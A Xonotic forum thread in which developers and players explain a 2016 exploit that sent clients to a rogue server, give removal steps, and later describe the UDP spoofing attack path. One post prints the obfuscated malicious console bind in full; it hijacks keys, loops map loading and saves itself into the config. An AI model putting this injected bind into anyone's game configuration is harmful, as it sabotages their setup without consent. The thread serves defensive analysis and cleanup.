Xonotic Virus - Printable Version +- Xonotic Forums (https://forums.xonotic.org) +-- Forum: Community (https://forums.xonotic.org/forumdisplay.php?fid=6) +--- Forum: Xonotic - General (https://forums.xonotic.org/forumdisplay.php?fid=18) +--- Thread: Xonotic Virus (/showthread.php?tid=6261) |
Xonotic Virus - Mario - 06-16-2016 Hello all, Recently, there has been reports of wobbly screens and binds overwritten. After some investigation, we discovered an exploit that has been used to redirect clients to a modified server, which then creates a custom autoexec.cfg in the user's data directory. While the exploit is in the process of being fixed, we can't fix the changes to your configuration made by this "virus" automatically. Steps for removal: 1. Delete the malicious autoexec.cfg (Windows: C:\Users\yourusername\Saved Games\xonotic\data\autoexec.cfg, Linux: ~/.xonotic/data/autoexec.cfg, Mac: ~/Library/Application Support/xonotic/data/autoexec.cfg) 2. Launch the game and open the console (SHIFT+ESC, or ~), then type the following and press ENTER: v_idlescale 0 3. Check the Settings/Input menu for any suspicious looking keybinds and reset them to default RE: Xonotic Virus - Slick Butter - 06-16-2016 Can this only change keybinds and run in-game/autoexec commands or is there potential for something worse to happen? RE: Xonotic Virus - Beagle - 06-16-2016 Umm, eh about that. I don't have an autoexec file on ~/.xonotic/data. Does that mean I'm safe? And my v_idlescale is 0 by default. RE: Xonotic Virus - Mario - 06-16-2016 The game is sandboxed fairly well, what this script has done is about as bad as it can get. RE: Xonotic Virus - Steak - 06-16-2016 Does it affect people that symlinked their autoexec.cfg to dropbox, etc.? RE: Xonotic Virus - divVerent - 06-17-2016 It might propagate to Dropbox too, if the symlink had a writable destination. The removal steps though are not sufficient. I'd rather recommend editing config.cfg and removing any suspicious binds (any line longer than a screen length is probably wrong). Can also remove the v_idlescale command while at it. RE: Xonotic Virus - -z- - 06-17-2016 For a little more details on what this looks like, the following lines were discovered in autoexec.cfg and config.cfg: Code: bind BACKSLASH "toggleconsole;alias g_fnbwnjlts0 \"\";alias g_fnbwnjlts1 \"alias cl_hook_gamestart_all \\\"map implosion;cl_hook_gamestart_all\\\";cl_hook_gamestart_all;\";menu_cmd rpn /g_igdpbhxyhlodf $cl_matchcount $r_bjsgmspjglr gt def;g_fnbwnjlts${g_igdpbhxyhlodf};menu_cmd rpn /g_igdpbhxyhlodf $vid_gqfhyyvfq $cl_matchcount gt def;g_fnbwnjlts${g_igdpbhxyhlodf};unset vid_gqfhyyvfq;unset r_bjsgmspjglr;unbind ~;bind ~ toggleconsole;unbind `;bind ` toggleconsole;unbind BACKSLASH;bind BACKSLASH toggleconsole;unbind ^;bind ^ toggleconsole;unbind t;bind t messagemode;unbind F5;bind F5 menu_showteamselect;unbind F6;bind F6 team_auto;saveconfig;" Deobfuscating one of the binds, it appears to create a recursive call to an alias by using a strange rpn calculate to essentially get a 1 or 0 value that correlate with the two aliases, g_fnbwnjlts0 and g_fnbwnjlts1. The code caused quakec to crash, resulting in a hung client when I attempted to drop the terminal using tilde. I'm not sure if this was the intended behavior or not. As for now it appears this was just an annoyance. Code: // These values were set by the script and are referenced below RE: Xonotic Virus - Beagle - 06-17-2016 What or who is creating these viruses? RE: Xonotic Virus - PinkRobot - 06-18-2016 I suspect it's probably the people behind Nexuiz Antivirus program. RE: Xonotic Virus - dekrY - 06-18-2016 HAHA!!!!! I had that about a week ago!!!! I realized that some of my binds and aliases stopped working, and that my game would get stuck on loading screens, after a map would end, or sometimes would throw me out upon connecting. Took a look at my config and it was messed up, so I just deleted it, the game generated a default one and then I was ok. RE: Xonotic Virus - Midori - 06-23-2016 So, i have just decided to register on the forums because of all of this. Thanks for all the input on the topic, but the thing i'm (and possibly other players too) really waiting for is detailed technical info on how such exploit was even possible, how the attackers managed to inject malicious code and pass it through, and what are other, much more dangerous risks this exploit pottentially poses for both Windows and GNU/Linux players (since it could have been much worse according to the person who claimed to be the troll behind this on the IRC). Of course i'm against disclosing any sensitive details until the game is fixed, that is until next update, to prevent others from trying to abuse it even more. The fact is, i have unfortunately quit playing Xon for now because of this happening, because i run Xonotic on my main machine, and i don't own any spare PC to set it up for running risky things, so i have high hopes for a bulletproof solution in the next release. It's pretty sad, maybe even shameful to see such things happening in a relatively niche, open source game with good community around it, and there's something ironic in the fact that my goal was to find a game free from trolls and malware, and now we're getting this. What is Xonotic's blessing from gameplay point of view, is also a curse from security POV, that is, so many things are provided server-side (including the code), thus pottentially exploitable. Anyway, best luck to the devteam dealing with this poop. RE: Xonotic Virus - Smilecythe - 06-23-2016 Found something that I don't understand in my config. It's under "net_slists_favorites" which is a segment for favorited servers, it shows a bunch of IP addresses and then some weird looking chunks of code. Is this normal config stuff or part of the virus? Code: "net_slist_favorites" "136.243.145.236:30003 85.25.47.35:26000 theregulars.eu:26001 80.95.150.251:26000 91.250.119.24:26000 146.0.36.65:26001 176.9.65.177:30003 176.9.65.177:30160 37.221.196.102:26000 213.198.94.130:26500 78.46.52.34:26042 130.149.55.207:26045 94.23.20.72:26010 84.201.39.203:26000 78.46.77.131:26006 eavhJ1aGrTl9qmGUhpJmikn+QOWr/xdoilQv/HWqUDg= TSmq9MV0YYaplcNVI8fTstFDI6lOkZAUfw5lJX3cooo= 3EEGBqGZW2rL4v7ERvzd9ZIU+okSuwPTtbIjf0vJSF4= Mc18V9hyVsXUN5vPzw17Mh3Q1WFEW8Mc0ZkwpU10m5k= lDpj28sgSytBdGtYH71+FrGGttHAoImeMpS6ZtqrsHE= YKo9fimYMBr3wortHFeMVCRhmnZr3AaIOx9IhFhm4Cc= qlcsRejpAi6GJTcqTzgRVfunKxUAmMI9Xpkp//B8hxg= ZKEs6G/40kFInTGd62d+NjSGOY8RPOejic7W/CLkxMA= odP0r571SEU5iX3nRPQeQDFpfhmyGYC4m4SamMSTEMI= jE6Zhvs5sOvKYUF9yra1Eh4yRfGJirFTXlURewJSSuc= 6lqsM0FIQ5JZbrEdjWY91/xCubUBbhIGUh1rgXIGUgs= tgVwyVN7pdXheg3eZCdO/WC3OylP5Qt1ptbOO4g7B/U= 7NnI7PyTvlhNUf10mEnlu0aH7nj19EZoXVOaHdZrFnU= Ot40nQJtTVHpdMEUgmBmVb6yvGfbIUneP2Al/lbD5TM= kV3UkVGqke8UhrgIWKhTOU/nDhk3f+OT7TVEfqh9xy0= 7hWPnEroUpCzlCIiQ4d0/U/4/hKFj9VjElarGFZayKw= fdx4J4EsHEqtnzwKhsxrvRkYpYhSuUfJZs301oU1l8c= DtMRmj4DVBZqgipV6C2hpOyFsnn4TM1it7kDlUTfmOg= fpd0YafKdywMMxHR5xAwyK4Xn/POe67n52a1wKNS3dY= a4J2Rijt3LvrscsZuzK+sMHJwTrcHRAw+CZ6l8OqdnY= aMU1pg9RFidLuNDPOqISqv66O9c0p+ENL/dX2r5Zzd0= OrqjVkTWmrxxgzezUGPyS7Og8vCBjuGGg0jaYyEoTmY= 3JUXyCnH75jjUcV6LJywVHKVKJTr0XxJupRO5sgLah4= ChCqZDqGnEYzT3Edng6is9BycxImC76LBg48869NhB8= RToXbhWy2WDQSJGuomdZTgmemsvXXhdXqAUDPmWphpg= PWB/fupA8iK+j3WjfyxQPIbMPInn93LBJLHBk5iN1TA= jkPN+tds2TTkBH5zHAoRqTsNiHZsxnYyhuFAQPU3jwk= l/i6gGNTlRSGGxyufKIhXMgDMz3m5nzil4Wlt2uKALg= DqnhpOb5AKJqnvt0GvhemrxJk7jRKRfwL3w61eSbCXA= nSzaAv9Fwy3nXaVIqifeJJmXWHvQfHQkCKhcQt1PI/k= 1J+eIDbvcTTj6/EXp+QHnFl9NHInD34N2boaa8c+WjI= Cq4VCIRT0nDlpvrVC7YjvMOvAt0dx8hJfZZqCV0LDaY= BGqDEvHd99T1WcPOyIo6oaiC/WjtztOLpNcNjAEmvA0= qwJp40inHRn+vxB5qeI8mfXu7guGf9llVNdaiC/rR0c= DPUta7v9M9YLYe5gQFdLQvHiJNINt78Dk1/0EhoTflE= 43qjhvu/xqmD6IiDY0zhRJk36UoDLGKgmOCOxgOBluw= MID1nq2ihzyydhUBH0MK9IbA1zsvbRflxOZ+xWaDggM= /U/a7XxRzDVJ2G3Wt8+0FPi+2Tr9FEzHx4HnTeH9SSs= Eo2hrrSEwyxiGsWutwQ/A3gDJFx1cV7enbSjaBL96HA= AYQDHffb3DyZCchaJKjNcDrtNV2ln4/VAayaTzLMmwA= Hl+nHXrPWGAiDOYpNANX0qUKGCzV+K0GVMlWCHCNmHc= V1w2u7Zt3yFlB3poz3dF+t+4SMsQeIhZiirbjR9GnAQ= cfTWCVMoaEXWtSvJyWhWp04abgwA4KVO9NJYhleDZzg= J9dUTTVQN6gRBDtrEGiVfrsGQ/UgGii5Ba+9C775aN4= 3TgWwpTKPPdrrunW27tMQDg5O/Ch2q4YtH6w1dSVXFg= E6vPsyfte6Ly/gZt8H33yHq9UF6uXaoV0KBlshXrSy4= GADBgOOY1Vpo2kUhnWQO0Is8vxsDxmgBgbF5UrRZNIQ= tIRcKUTikyNCSHm5xGiLdQE66ok6+xW080Cclgc+aqw= o4fBETBPdCs+5T1JYy7CLKKCPkGMO7RSH+32q9v+CfM= 6QtAVwbWcJFYZDvSeuZHEaaJE4JoTzmNni/LPZUSOKE= J9JepdOZjvCBXYfz8fj3civ4PulKF4/asnK9u5ZojYg= gcYJTjKtN2qjsJjL8pO/VqBERO2A9YhloJbriEYFUwg= F0xBweCwFKeiVMtkW4NgBic6m+a+PcUy8NZnWqxpWI4= f7dLd940u4KlLaxUPdwozZL5bPmVKi9CYBMYczkm1+c=" RE: Xonotic Virus - Mario - 06-23-2016 Those look normal enough, they're stats IDs (hopefully for servers you've bookmarked). They're more likely to still work even if the server changes its IP. RE: Xonotic Virus - PinkRobot - 06-23-2016 I would say that we have been let off easily by this hacker. It would have been much worse if it had set cvar rm_rf to 1. RE: Xonotic Virus - Beagle - 06-23-2016 rm_rf isn't a cvar anymore. That's good. RE: Xonotic Virus - joeDeuce - 06-23-2016 Maybe if Xonotic didn't suck so bad RE: Xonotic Virus - Smilecythe - 06-24-2016 (06-23-2016, 06:17 PM)joeDeuce Wrote: Maybe if Xonotic didn't suck so badWelcome to Xonotic, here's a tutorial for newbies: http://xonotic.org/posts/2014/halogenes-newbie-corner-comprehensive-tutorial/ RE: Xonotic Virus - R+e^i - 06-24-2016 This is hilarious. What was the injection path? Did they poison some random server or a centralized piece like the stats server? The effects of the least interesting thing, what interests me and what matters is how the code was injected in the first place. RE: Xonotic Virus - -z- - 06-25-2016 As far as I know, the attack was a sort of "man-on-the-side" attack which boils down to UDP packets from an attack server attacking like a legitimate server arriving on the client fast than legit packets. Servers with encryption enabled are not affected because these servers can be identified with div's double-blind encryption. An attacker would have to have that server's private key to execute the attack in that case. |